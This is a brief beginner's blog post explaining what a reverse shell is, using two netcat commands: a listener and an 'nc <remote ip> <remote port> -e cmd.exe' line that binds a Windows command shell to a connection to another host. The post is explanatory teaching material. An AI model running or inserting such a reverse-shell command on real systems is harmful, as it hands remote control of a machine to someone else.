DEV Community

Cover image for Glimpse of Reverse Shell
Kalaimani
Kalaimani

Posted on • Updated on

Glimpse of Reverse Shell

Reverse shell is connection that originates from victim machine to attacker machine as result of malware infection or a vulnerability exploitation.

But you can get glimpse of how reverse shell works without exploiting or infecting a machine with simple netcat command. here how it works..

First run the following command on the remote system. The -l option sets the netcat on listening mode.

nc -l -p <port to listen on>

Image description

And then run this command on victim machine. The -e option binds the standard input and output of a cmd.exe instance to netcat socket which is about to establish a connection to the remote machine.

nc <remote ip> <remote port> -e cmd.exe

Image description

Et voilà.. You get a remote shell and you can type commands to get the results on the other end

Image description

More or less malware and exploits do something similar but in stealthy way. I hope this helps you as beginner how reverse shell works..

Discussion (0)